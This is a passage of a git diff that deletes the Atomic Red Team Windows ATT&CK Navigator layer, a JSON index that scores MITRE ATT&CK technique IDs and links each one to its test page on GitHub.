a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json 
@@ -1 +0,0 @@
-{"version":"4.3","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.006","score":100,"enabled":true,"links":[{"label":"View
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1021","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1037.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1055.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1056.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1056","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1069.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1069","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1071.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1071","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1074","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1078","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1087","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1091","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1112","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1114","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1115","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1127.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1127","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1132.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1132","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1136","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1137.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1137","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1137","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1197","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1207","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1216","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1216","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View 
